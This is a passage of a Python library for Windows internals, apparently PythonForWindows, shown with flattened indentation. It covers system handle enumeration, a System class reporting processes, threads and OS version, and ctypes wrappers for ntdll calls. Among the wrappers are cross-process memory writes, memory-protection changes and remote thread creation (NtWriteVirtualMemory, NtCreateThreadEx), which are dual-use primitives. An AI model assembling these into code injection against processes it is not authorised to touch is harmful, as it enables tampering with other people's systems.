winproxy.NtQuerySystemInformation(16, buffer, size, ReturnLength=ctypes.byref(size_needed))
except WindowsError as e:
pass
size = size_needed.value + 0x1000
buffer = ctypes.c_buffer(size)
winproxy.NtQuerySystemInformation(16, buffer, size, ReturnLength=ctypes.byref(size_needed))
x = SYSTEM_HANDLE_INFORMATION.from_buffer(buffer)
class _GENERATED_SYSTEM_HANDLE_INFORMATION(ctypes.Structure):
_fields_ = [
("HandleCount", ULONG),
("Handles", Handle * x.HandleCount),
]
return list(_GENERATED_SYSTEM_HANDLE_INFORMATION.from_buffer_copy(buffer[:size_needed.value]).Handles)
```
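A hedged sketch of walking the system handle table with ``enumerate_handles`` above; inspecting handles of other processes usually requires administrative privileges, so the filter sticks to the current process.

```python
# Hedged sketch: keep only our own process' handles, then the named Events.
import windows
from windows.winobject.handle import enumerate_handles

mine = [h for h in enumerate_handles()
        if h.dwProcessId == windows.current_process.pid]
named_events = [h for h in mine if h.type == "Event" and h.name]
for h in named_events[:5]:
    print("{0!r} -> {1}".format(h, h.name))
```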
#### File: windows/winobject/system.py
```python
import os
import ctypes
import copy
import struct
import windows
from windows import winproxy
from windows import utils
import windows.generated_def as gdef
from windows.winobject import process
from windows.winobject import network
from windows.winobject import registry
from windows.winobject import exception
from windows.winobject import service
from windows.winobject import volume
from windows.winobject import wmi
from windows.winobject import object_manager
from windows.winobject import handle
from windows.winobject import event_log
from windows.winobject import task_scheduler
from windows.winobject import system_module
from windows.generated_def.winstructs import *
from windows.dbgprint import dbgprint
class System(object):
"""The state of the current ``Windows`` system ``Python`` is running on"""
# Setup these in a fixedproperty ?
network = network.Network()
"""Object of class :class:`windows.winobject.network.Network`"""
registry = registry.Registry()
"""Object of class :class:`windows.winobject.registry.Registry`"""
@property
def processes(self):
"""The list of running processes
:type: [:class:`~windows.winobject.process.WinProcess`] -- A list of Process
"""
return self.enumerate_processes()
@property
def threads(self):
"""The list of running threads
:type: [:class:`~windows.winobject.process.WinThread`] -- A list of Thread
"""
return self.enumerate_threads_setup_owners()
@property
def logicaldrives(self):
"""List of logical drives [C:\, ...]
:type: [:class:`~windows.winobject.volume.LogicalDrive`] -- A list of LogicalDrive
"""
return volume.enum_logical_drive()
@property
def services(self):
"""The list of services
:type: [:class:`~windows.winobject.service.ServiceA`] -- A list of Service"""
return service.enumerate_services()
@property
def handles(self):
"""The list of system handles
:type: [:class:`~windows.winobject.handle.Handle`] -- A list of Handle"""
return handle.enumerate_handles()
@property
def modules(self):
"""The list of system modules
:type: [:class:`~windows.winobject.system_module.SystemModule`] -- A list of :class:`~windows.winobject.system_module.SystemModule` or :class:`~windows.winobject.system_module.SystemModuleWow64`
"""
return system_module.enumerate_kernel_modules()
@utils.fixedpropety
def bitness(self):
"""The bitness of the system
:type: :class:`int` -- 32 or 64
"""
if os.environ["PROCESSOR_ARCHITECTURE"].lower() != "x86":
return 64
if "PROCESSOR_ARCHITEW6432" in os.environ:
return 64
return 32
@utils.fixedpropety
def wmi(self):
r"""An object to perform wmi requests to various namespaces
:type: :class:`~windows.winobject.wmi.WmiManager`"""
return wmi.WmiManager()
@utils.fixedpropety
def event_log(self):
return event_log.EvtlogManager()
@utils.fixedpropety
def task_scheduler(self):
"""An object able to manage scheduled tasks on the local system
:type: :class:`~windows.winobject.task_scheduler.TaskService`
"""
windows.com.init()
clsid_task_scheduler = gdef.IID.from_string("0f87369f-a4e5-4cfc-bd3e-73e6154572dd")
task_service = task_scheduler.TaskService()
# What is non-implemented (WinXP)
# Raise (NotImplementedError?) ? Return NotImplemented ?
windows.com.create_instance(clsid_task_scheduler, task_service)
task_service.connect()
return task_service
@utils.fixedpropety
def object_manager(self):
"""An object to query the objects in the kernel object manager.
:type: :class:`~windows.winobject.object_manager.ObjectManager`
"""
return windows.winobject.object_manager.ObjectManager()
#TODO: use GetComputerNameExA ? and recover other names ?
@utils.fixedpropety
def computer_name(self):
"""The name of the computer
:type: :class:`str`
"""
size = DWORD(0x1000)
buf = ctypes.c_buffer(size.value)
winproxy.GetComputerNameA(buf, ctypes.byref(size))
return buf[:size.value]
@utils.fixedpropety
def version(self):
"""The version of the system
:type: (:class:`int`, :class:`int`) -- (Major, Minor)
"""
data = self.get_version()
result = data.dwMajorVersion, data.dwMinorVersion
if result == (6,2):
result_str = self.get_file_version("kernel32")
result_tup = [int(x) for x in result_str.split(".")]
result = tuple(result_tup[:2])
return result
@utils.fixedpropety
def version_name(self):
"""The name of the system version, values are:
* Windows Server 2016
* Windows 10
* Windows Server 2012 R2
* Windows 8.1
* Windows Server 2012
* Windows 8
* Windows Server 2008 R2
* Windows 7
* Windows Server 2008
* Windows Vista
* Windows XP Professional x64 Edition
* TODO: version (5.2) + is_workstation + bitness == 32 (don't even know if possible..)
* Windows Server 2003 R2
* Windows Server 2003
* Windows XP
* Windows 2000
* "Unknow Windows <version={0} | is_workstation={1}>".format(version, is_workstation)
:type: :class:`str`
"""
version = self.version
is_workstation = self.product_type == VER_NT_WORKSTATION
if version == (10, 0):
return ["Windows Server 2016", "Windows 10"][is_workstation]
elif version == (6, 3):
return ["Windows Server 2012 R2", "Windows 8.1"][is_workstation]
elif version == (6, 2):
return ["Windows Server 2012", "Windows 8"][is_workstation]
elif version == (6, 1):
return ["Windows Server 2008 R2", "Windows 7"][is_workstation]
elif version == (6, 0):
return ["Windows Server 2008", "Windows Vista"][is_workstation]
elif version == (5, 2):
metric = winproxy.GetSystemMetrics(SM_SERVERR2)
if is_workstation:
if self.bitness == 64:
return "Windows XP Professional x64 Edition"
else:
return "TODO: version (5.2) + is_workstation + bitness == 32"
elif metric != 0:
return "Windows Server 2003 R2"
else:
return "Windows Server 2003"
elif version == (5, 1):
return "Windows XP"
elif version == (5, 0):
return "Windows 2000"
else:
return "Unknow Windows <version={0} | is_workstation={1}>".format(version, is_workstation)
VERSION_MAPPER = gdef.FlagMapper(VER_NT_WORKSTATION, VER_NT_DOMAIN_CONTROLLER, VER_NT_SERVER)
@utils.fixedpropety
def product_type(self):
"""The product type, value might be:
* VER_NT_WORKSTATION(0x1L)
* VER_NT_DOMAIN_CONTROLLER(0x2L)
* VER_NT_SERVER(0x3L)
:type: :class:`long` or :class:`int` (or subclass)
"""
version = self.get_version()
return self.VERSION_MAPPER[version.wProductType]
EDITION_MAPPER = gdef.FlagMapper(PRODUCT_UNDEFINED,
PRODUCT_ULTIMATE,
PRODUCT_HOME_BASIC,
PRODUCT_HOME_PREMIUM,
PRODUCT_ENTERPRISE,
PRODUCT_HOME_BASIC_N,
PRODUCT_BUSINESS,
PRODUCT_STANDARD_SERVER,
PRODUCT_DATACENTER_SERVER,
PRODUCT_SMALLBUSINESS_SERVER,
PRODUCT_ENTERPRISE_SERVER,
PRODUCT_STARTER,
PRODUCT_DATACENTER_SERVER_CORE,
PRODUCT_STANDARD_SERVER_CORE,
PRODUCT_ENTERPRISE_SERVER_CORE,
PRODUCT_ENTERPRISE_SERVER_IA64,
PRODUCT_BUSINESS_N,
PRODUCT_WEB_SERVER,
PRODUCT_CLUSTER_SERVER,
PRODUCT_HOME_SERVER,
PRODUCT_STORAGE_EXPRESS_SERVER,
PRODUCT_STORAGE_STANDARD_SERVER,
PRODUCT_STORAGE_WORKGROUP_SERVER,
PRODUCT_STORAGE_ENTERPRISE_SERVER,
PRODUCT_SERVER_FOR_SMALLBUSINESS,
PRODUCT_SMALLBUSINESS_SERVER_PREMIUM,
PRODUCT_HOME_PREMIUM_N,
PRODUCT_ENTERPRISE_N,
PRODUCT_ULTIMATE_N,
PRODUCT_WEB_SERVER_CORE,
PRODUCT_MEDIUMBUSINESS_SERVER_MANAGEMENT,
PRODUCT_MEDIUMBUSINESS_SERVER_SECURITY,
PRODUCT_MEDIUMBUSINESS_SERVER_MESSAGING,
PRODUCT_SERVER_FOUNDATION,
PRODUCT_HOME_PREMIUM_SERVER,
PRODUCT_SERVER_FOR_SMALLBUSINESS_V,
PRODUCT_STANDARD_SERVER_V,
PRODUCT_DATACENTER_SERVER_V,
PRODUCT_ENTERPRISE_SERVER_V,
PRODUCT_DATACENTER_SERVER_CORE_V,
PRODUCT_STANDARD_SERVER_CORE_V,
PRODUCT_ENTERPRISE_SERVER_CORE_V,
PRODUCT_HYPERV,
PRODUCT_STORAGE_EXPRESS_SERVER_CORE,
PRODUCT_STORAGE_STANDARD_SERVER_CORE,
PRODUCT_STORAGE_WORKGROUP_SERVER_CORE,
PRODUCT_STORAGE_ENTERPRISE_SERVER_CORE,
PRODUCT_STARTER_N,
PRODUCT_PROFESSIONAL,
PRODUCT_PROFESSIONAL_N,
PRODUCT_SB_SOLUTION_SERVER,
PRODUCT_SERVER_FOR_SB_SOLUTIONS,
PRODUCT_STANDARD_SERVER_SOLUTIONS,
PRODUCT_STANDARD_SERVER_SOLUTIONS_CORE,
PRODUCT_SB_SOLUTION_SERVER_EM,
PRODUCT_SERVER_FOR_SB_SOLUTIONS_EM,
PRODUCT_SOLUTION_EMBEDDEDSERVER,
PRODUCT_SOLUTION_EMBEDDEDSERVER_CORE,
PRODUCT_SMALLBUSINESS_SERVER_PREMIUM_CORE,
PRODUCT_ESSENTIALBUSINESS_SERVER_MGMT,
PRODUCT_ESSENTIALBUSINESS_SERVER_ADDL,
PRODUCT_ESSENTIALBUSINESS_SERVER_MGMTSVC,
PRODUCT_ESSENTIALBUSINESS_SERVER_ADDLSVC,
PRODUCT_CLUSTER_SERVER_V,
PRODUCT_EMBEDDED,
PRODUCT_STARTER_E,
PRODUCT_HOME_BASIC_E,
PRODUCT_HOME_PREMIUM_E,
PRODUCT_PROFESSIONAL_E,
PRODUCT_ENTERPRISE_E,
PRODUCT_ULTIMATE_E,
PRODUCT_ENTERPRISE_EVALUATION,
PRODUCT_MULTIPOINT_STANDARD_SERVER,
PRODUCT_MULTIPOINT_PREMIUM_SERVER,
PRODUCT_STANDARD_EVALUATION_SERVER,
PRODUCT_DATACENTER_EVALUATION_SERVER,
PRODUCT_ENTERPRISE_N_EVALUATION,
PRODUCT_STORAGE_WORKGROUP_EVALUATION_SERVER,
PRODUCT_STORAGE_STANDARD_EVALUATION_SERVER,
PRODUCT_CORE_ARM,
PRODUCT_CORE_N,
PRODUCT_CORE_COUNTRYSPECIFIC,
PRODUCT_CORE_LANGUAGESPECIFIC,
PRODUCT_CORE,
PRODUCT_PROFESSIONAL_WMC,
PRODUCT_UNLICENSED)
@utils.fixedpropety
def edition(self): # Find a better name ?
version = self.get_version()
edition = DWORD()
try:
winproxy.GetProductInfo(version.dwMajorVersion,
version.dwMinorVersion,
version.wServicePackMajor,
version.wServicePackMinor,
edition)
except winproxy.ExportNotFound as e:
# Windows XP does not implement GetProductInfo
assert (version.dwMajorVersion, version.dwMinorVersion) == (5, 1)
return self._edition_windows_xp()
return self.EDITION_MAPPER[edition.value]
def _edition_windows_xp(self):
# Emulate standard response from IsOS(gdef.OS_PROFESSIONAL)
if winproxy.IsOS(gdef.OS_PROFESSIONAL):
return PRODUCT_PROFESSIONAL
return PRODUCT_HOME_BASIC
@utils.fixedpropety
def windir(self):
buffer = ctypes.c_buffer(0x100)
reslen = winproxy.GetWindowsDirectoryA(buffer)
return buffer[:reslen]
def get_version(self):
data = windows.generated_def.OSVERSIONINFOEXA()
data.dwOSVersionInfoSize = ctypes.sizeof(data)
winproxy.GetVersionExA(ctypes.cast(ctypes.pointer(data), ctypes.POINTER(windows.generated_def.OSVERSIONINFOA)))
return data
def get_file_version(self, name):
size = winproxy.GetFileVersionInfoSizeA(name)
buf = ctypes.c_buffer(size)
winproxy.GetFileVersionInfoA(name, 0, size, buf)
bufptr = PVOID()
bufsize = UINT()
winproxy.VerQueryValueA(buf, "\\VarFileInfo\\Translation", ctypes.byref(bufptr), ctypes.byref(bufsize))
bufstr = ctypes.cast(bufptr, LPCSTR)
tup = struct.unpack("<HH", bufstr.value[:4])
req = "{0:04x}{1:04x}".format(*tup)
winproxy.VerQueryValueA(buf, "\\StringFileInfo\\{0}\\ProductVersion".format(req), ctypes.byref(bufptr), ctypes.byref(bufsize))
bufstr = ctypes.cast(bufptr, LPCSTR)
return bufstr.value
@utils.fixedpropety
def build_number(self):
# This returns the last version where ntdll was updated
# Should look at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
# values: CurrentBuild + UBR
# windows.system.registry(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion")["CurrentBuild"].value
# windows.system.registry(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion")["UBR"].value
return self.get_file_version("comctl32")
@staticmethod
def enumerate_processes():
dbgprint("Enumerating processes with CreateToolhelp32Snapshot", "SLOW")
process_entry = PROCESSENTRY32()
process_entry.dwSize = ctypes.sizeof(process_entry)
snap = winproxy.CreateToolhelp32Snapshot(gdef.TH32CS_SNAPPROCESS, 0)
winproxy.Process32First(snap, process_entry)
res = []
res.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
while winproxy.Process32Next(snap, process_entry):
res.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
winproxy.CloseHandle(snap)
return res
@staticmethod
def enumerate_threads_generator():
# Potentially dangerous, because we yield the same THREADENTRY32 object each time
dbgprint("Enumerating threads with CreateToolhelp32Snapshot <generator>", "SLOW")
thread_entry = THREADENTRY32()
thread_entry.dwSize = ctypes.sizeof(thread_entry)
snap = winproxy.CreateToolhelp32Snapshot(gdef.TH32CS_SNAPTHREAD, 0)
dbgprint("New handle CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD) <generator> | {0:#x}".format(snap), "HANDLE")
try:
winproxy.Thread32First(snap, thread_entry)
yield thread_entry
while winproxy.Thread32Next(snap, thread_entry):
yield thread_entry
finally:
winproxy.CloseHandle(snap)
dbgprint("CLOSE CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD) <generator> | {0:#x}".format(snap), "HANDLE")
@staticmethod
def enumerate_threads():
return [WinThread._from_THREADENTRY32(th) for th in System.enumerate_threads_generator()]
def enumerate_threads_setup_owners(self):
# Enumerating threads is a special operation concerning the owner process.
# We may not be able to retrieve the name of the owning process by normal way
# (as we need to get a handle on the process)
# So, this implementation of enumerate_thread also setup the owner with the result of enumerate_processes
dbgprint("Enumerating threads with CreateToolhelp32Snapshot and setup owner", "SLOW")
# One snapshot for both enumerations, to prevent a race condition
snap = winproxy.CreateToolhelp32Snapshot(gdef.TH32CS_SNAPTHREAD | gdef.TH32CS_SNAPPROCESS, 0)
process_entry = PROCESSENTRY32()
process_entry.dwSize = ctypes.sizeof(process_entry)
winproxy.Process32First(snap, process_entry)
processes = []
processes.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
while winproxy.Process32Next(snap, process_entry):
processes.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
# Forge a dict pid -> process
proc_dict = {proc.pid: proc for proc in processes}
thread_entry = THREADENTRY32()
thread_entry.dwSize = ctypes.sizeof(thread_entry)
threads = []
winproxy.Thread32First(snap, thread_entry)
parent = proc_dict[thread_entry.th32OwnerProcessID]
threads.append(process.WinThread._from_THREADENTRY32(thread_entry, owner=parent))
while winproxy.Thread32Next(snap, thread_entry):
parent = proc_dict[thread_entry.th32OwnerProcessID]
threads.append(process.WinThread._from_THREADENTRY32(thread_entry, owner=parent))
winproxy.CloseHandle(snap)
return threads
```
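A short usage sketch of the `System` object above. It assumes the usual `windows.system` singleton that PythonForWindows exposes at import time; shown only as an illustration, not taken from the repository:
```python
import windows

system = windows.system
print(system.computer_name, system.version_name, system.bitness)

# List the PID and name of every running process (attribute names assumed
# from the WinProcess objects returned by enumerate_processes()).
for proc in system.processes:
    print(proc.pid, proc.name)
```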
#### File: winproxy/apis/ntdll.py
```python
import ctypes
import windows.generated_def as gdef
from ..apiproxy import ApiProxy, NeededParameter
from ..error import WinproxyError, result_is_ntstatus, fail_on_zero
class NtdllProxy(ApiProxy):
APIDLL = "ntdll"
default_error_check = staticmethod(result_is_ntstatus)
# Memory
@NtdllProxy()
def NtReadVirtualMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead):
return NtReadVirtualMemory.ctypes_function(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead)
@NtdllProxy()
def NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten):
return NtWriteVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten)
# Wow64
@NtdllProxy()
def NtWow64ReadVirtualMemory64(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead=None):
return NtWow64ReadVirtualMemory64.ctypes_function(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead)
@NtdllProxy()
def NtWow64WriteVirtualMemory64(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten=None):
return NtWow64WriteVirtualMemory64.ctypes_function(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten)
# File
@NtdllProxy()
def NtCreateFile(FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize, FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength):
return NtCreateFile.ctypes_function(FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize, FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength)
@NtdllProxy()
def NtSetInformationFile(FileHandle, IoStatusBlock, FileInformation, Length, FileInformationClass):
return NtSetInformationFile.ctypes_function(FileHandle, IoStatusBlock, FileInformation, Length, FileInformationClass)
@NtdllProxy()
def NtQueryInformationFile(FileHandle, IoStatusBlock, FileInformation, Length=None, FileInformationClass=NeededParameter):
if Length is None:
Length = ctypes.sizeof(FileInformation)
return NtQueryInformationFile.ctypes_function(FileHandle, IoStatusBlock, FileInformation, Length, FileInformationClass)
@NtdllProxy()
def NtQueryDirectoryFile(FileHandle, Event=None, ApcRoutine=None, ApcContext=None, IoStatusBlock=NeededParameter, FileInformation=NeededParameter, Length=None, FileInformationClass=NeededParameter, ReturnSingleEntry=NeededParameter, FileName=None, RestartScan=NeededParameter):
if Length is None:
Length = ctypes.sizeof(FileInformation)
return NtQueryDirectoryFile.ctypes_function(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan)
@NtdllProxy()
def NtQueryVolumeInformationFile(FileHandle, IoStatusBlock, FsInformation, Length=None, FsInformationClass=NeededParameter):
if Length is None:
Length = ctypes.sizeof(FsInformation)
return NtQueryVolumeInformationFile.ctypes_function(FileHandle, IoStatusBlock, FsInformation, Length, FsInformationClass)
@NtdllProxy()
def NtQueryEaFile(FileHandle, IoStatusBlock, Buffer, Length, ReturnSingleEntry, EaList, EaListLength, EaIndex, RestartScan):
return NtQueryEaFile.ctypes_function(FileHandle, IoStatusBlock, Buffer, Length, ReturnSingleEntry, EaList, EaListLength, EaIndex, RestartScan)
@NtdllProxy()
def NtSetEaFile(FileHandle, IoStatusBlock, Buffer, Length):
return NtSetEaFile.ctypes_function(FileHandle, IoStatusBlock, Buffer, Length)
# Process
@NtdllProxy()
def NtQueryInformationProcess(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength=0, ReturnLength=None):
if ProcessInformation is not None and ProcessInformationLength == 0:
ProcessInformationLength = ctypes.sizeof(ProcessInformation)
if type(ProcessInformation) == gdef.PROCESS_BASIC_INFORMATION:
ProcessInformation = ctypes.byref(ProcessInformation)
if ReturnLength is None:
ReturnLength = ctypes.byref(gdef.ULONG())
return NtQueryInformationProcess.ctypes_function(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength, ReturnLength)
@NtdllProxy()
def NtSetInformationProcess(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength=0):
if not ProcessInformationLength:
ProcessInformationLength = ctypes.sizeof(ProcessInformation)
return NtSetInformationProcess.ctypes_function(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength)
@NtdllProxy()
def LdrLoadDll(PathToFile, Flags, ModuleFileName, ModuleHandle):
return LdrLoadDll.ctypes_function(PathToFile, Flags, ModuleFileName, ModuleHandle)
@NtdllProxy()
def RtlGetUnloadEventTraceEx(ElementSize, ElementCount, EventTrace):
return RtlGetUnloadEventTraceEx.ctypes_function(ElementSize, ElementCount, EventTrace)
# Thread
@NtdllProxy()
def NtGetContextThread(hThread, lpContext):
return NtGetContextThread.ctypes_function(hThread, lpContext)
@NtdllProxy()
def NtQueryInformationThread(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = ctypes.byref(gdef.ULONG())
if ThreadInformation is not None and ThreadInformationLength == 0:
ThreadInformationLength = ctypes.sizeof(ThreadInformation)
return NtQueryInformationThread.ctypes_function(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength, ReturnLength)
@NtdllProxy()
def NtCreateProcessEx(ProcessHandle, DesiredAccess, ObjectAttributes=None, ParentProcess=NeededParameter, Flags=NeededParameter, SectionHandle=NeededParameter, DebugPort=None, ExceptionPort=None, InJob=False):
return NtCreateProcessEx.ctypes_function(ProcessHandle, DesiredAccess, ObjectAttributes, ParentProcess, Flags, SectionHandle, DebugPort, ExceptionPort, InJob)
@NtdllProxy()
def NtCreateThreadEx(ThreadHandle=None, DesiredAccess=0x1fffff, ObjectAttributes=0, ProcessHandle=NeededParameter, lpStartAddress=NeededParameter, lpParameter=NeededParameter, CreateSuspended=0, dwStackSize=0, Unknown1=0, Unknown2=0, Unknown3=0):
if ThreadHandle is None:
ThreadHandle = ctypes.byref(gdef.HANDLE())
return NtCreateThreadEx.ctypes_function(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, dwStackSize, Unknown1, Unknown2, Unknown3)
@NtdllProxy()
def NtSetContextThread(hThread, lpContext):
return NtSetContextThread.ctypes_function(hThread, lpContext)
# Memory
@NtdllProxy()
def NtAllocateVirtualMemory(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect):
return NtAllocateVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect)
@NtdllProxy()
def NtFreeVirtualMemory(ProcessHandle, BaseAddress, RegionSize, FreeType):
return NtFreeVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, RegionSize, FreeType)
@NtdllProxy()
def NtProtectVirtualMemory(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection=None):
if OldAccessProtection is None:
OldAccessProtection = gdef.DWORD()
return NtProtectVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection)
@NtdllProxy()
def NtQueryVirtualMemory(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation=NeededParameter, MemoryInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = ctypes.byref(gdef.ULONG())
if MemoryInformation is not None and MemoryInformationLength == 0:
MemoryInformationLength = ctypes.sizeof(MemoryInformation)
if type(MemoryInformation) == gdef.MEMORY_BASIC_INFORMATION64:
MemoryInformation = ctypes.byref(MemoryInformation)
return NtQueryVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation, MemoryInformationLength, ReturnLength)
# System
def ntquerysysteminformation_error_check(func_name, result, func, args):
if result == 0:
return args
# Ignore STATUS_INFO_LENGTH_MISMATCH if SystemInformation is None
if result == gdef.STATUS_INFO_LENGTH_MISMATCH and args[1] is None:
return args
raise WinproxyError("{0} failed with NTStatus {1}".format(func_name, hex(result)))
@NtdllProxy(error_check=ntquerysysteminformation_error_check)
def NtQuerySystemInformation(SystemInformationClass, SystemInformation=None, SystemInformationLength=0, ReturnLength=NeededParameter):
if SystemInformation is not None and SystemInformationLength == 0:
SystemInformationLength = ctypes.sizeof(SystemInformation)
return NtQuerySystemInformation.ctypes_function(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength)
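# Usage note (illustrative, not part of the original file): NtQuerySystemInformation
# is typically called twice -- once with SystemInformation=None so that ReturnLength
# receives the required size (the error check above tolerates the resulting
# STATUS_INFO_LENGTH_MISMATCH), then again with a buffer of that size, e.g.:
#   size = gdef.ULONG()
#   NtQuerySystemInformation(SomeInformationClass, None, 0, ctypes.byref(size))
#   buf = ctypes.c_buffer(size.value)
#   NtQuerySystemInformation(SomeInformationClass, buf, size.value, ctypes.byref(size))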
# path
@NtdllProxy(error_check=fail_on_zero)
def RtlDosPathNameToNtPathName_U(DosName, NtName=None, PartName=None, RelativeName=None):
return RtlDosPathNameToNtPathName_U.ctypes_function(DosName, NtName, PartName, RelativeName)
# kernel Object
@NtdllProxy()
def NtQueryObject(Handle, ObjectInformationClass, ObjectInformation=None, ObjectInformationLength=0, ReturnLength=NeededParameter):
return NtQueryObject.ctypes_function(Handle, ObjectInformationClass, ObjectInformation, ObjectInformationLength, ReturnLength)
@NtdllProxy()
def NtOpenDirectoryObject(DirectoryHandle, DesiredAccess, ObjectAttributes):
return NtOpenDirectoryObject.ctypes_function(DirectoryHandle, DesiredAccess, ObjectAttributes)
@NtdllProxy()
def NtQueryDirectoryObject(DirectoryHandle, Buffer, Length, ReturnSingleEntry, RestartScan, Context, ReturnLength):
return NtQueryDirectoryObject.ctypes_function(DirectoryHandle, Buffer, Length, ReturnSingleEntry, RestartScan, Context, ReturnLength)
@NtdllProxy()
def NtQuerySymbolicLinkObject(LinkHandle, LinkTarget, ReturnedLength):
return NtQuerySymbolicLinkObject.ctypes_function(LinkHandle, LinkTarget, ReturnedLength)
@NtdllProxy()
def NtOpenSymbolicLinkObject(LinkHandle, DesiredAccess, ObjectAttributes):
return NtOpenSymbolicLinkObject.ctypes_function(LinkHandle, DesiredAccess, ObjectAttributes)
# Event
@NtdllProxy()
def NtOpenEvent(EventHandle, DesiredAccess, ObjectAttributes):
return NtOpenEvent.ctypes_function(EventHandle, DesiredAccess, ObjectAttributes)
# ALPC
@NtdllProxy()
def NtAlpcCreatePort(PortHandle, ObjectAttributes, PortAttributes):
return NtAlpcCreatePort.ctypes_function(PortHandle, ObjectAttributes, PortAttributes)
@NtdllProxy()
def NtAlpcConnectPort(PortHandle, PortName, ObjectAttributes, PortAttributes, Flags, RequiredServerSid, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout):
return NtAlpcConnectPort.ctypes_function(PortHandle, PortName, ObjectAttributes, PortAttributes, Flags, RequiredServerSid, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout)
@NtdllProxy()
def NtAlpcConnectPortEx(PortHandle, ConnectionPortObjectAttributes, ClientPortObjectAttributes, PortAttributes, Flags, ServerSecurityRequirements, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout):
return NtAlpcConnectPortEx.ctypes_function(PortHandle, ConnectionPortObjectAttributes, ClientPortObjectAttributes, PortAttributes, Flags, ServerSecurityRequirements, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout)
@NtdllProxy()
def NtAlpcAcceptConnectPort(PortHandle, ConnectionPortHandle, Flags, ObjectAttributes, PortAttributes, PortContext, ConnectionRequest, ConnectionMessageAttributes, AcceptConnection):
return NtAlpcAcceptConnectPort.ctypes_function(PortHandle, ConnectionPortHandle, Flags, ObjectAttributes, PortAttributes, PortContext, ConnectionRequest, ConnectionMessageAttributes, AcceptConnection)
@NtdllProxy()
def NtAlpcQueryInformation(PortHandle, PortInformationClass, PortInformation, Length, ReturnLength):
return NtAlpcQueryInformation.ctypes_function(PortHandle, PortInformationClass, PortInformation, Length, ReturnLength)
@NtdllProxy()
def NtAlpcDisconnectPort(PortHandle, Flags):
return NtAlpcDisconnectPort.ctypes_function(PortHandle, Flags)
@NtdllProxy()
def NtAlpcSendWaitReceivePort(PortHandle, Flags, SendMessage, SendMessageAttributes, ReceiveMessage, BufferLength, ReceiveMessageAttributes, Timeout):
return NtAlpcSendWaitReceivePort.ctypes_function(PortHandle, Flags, SendMessage, SendMessageAttributes, ReceiveMessage, BufferLength, ReceiveMessageAttributes, Timeout)
@NtdllProxy()
def AlpcInitializeMessageAttribute(AttributeFlags, Buffer, BufferSize, RequiredBufferSize):
return AlpcInitializeMessageAttribute.ctypes_function(AttributeFlags, Buffer, BufferSize, RequiredBufferSize)
@NtdllProxy()
def AlpcGetMessageAttribute(Buffer, AttributeFlag):
return AlpcGetMessageAttribute.ctypes_function(Buffer, AttributeFlag)
@NtdllProxy()
def NtAlpcCreatePortSection(PortHandle, Flags, SectionHandle, SectionSize, AlpcSectionHandle, ActualSectionSize):
return NtAlpcCreatePortSection.ctypes_function(PortHandle, Flags, SectionHandle, SectionSize, AlpcSectionHandle, ActualSectionSize)
@NtdllProxy()
def NtAlpcDeletePortSection(PortHandle, Flags, SectionHandle):
return NtAlpcDeletePortSection.ctypes_function(PortHandle, Flags, SectionHandle)
@NtdllProxy()
def NtAlpcCreateSectionView(PortHandle, Flags, ViewAttributes):
return NtAlpcCreateSectionView.ctypes_function(PortHandle, Flags, ViewAttributes)
@NtdllProxy()
def NtAlpcDeleteSectionView(PortHandle, Flags, ViewBase):
return NtAlpcDeleteSectionView.ctypes_function(PortHandle, Flags, ViewBase)
@NtdllProxy()
def NtAlpcQueryInformationMessage(PortHandle, PortMessage, MessageInformationClass, MessageInformation, Length, ReturnLength):
return NtAlpcQueryInformationMessage.ctypes_function(PortHandle, PortMessage, MessageInformationClass, MessageInformation, Length, ReturnLength)
@NtdllProxy()
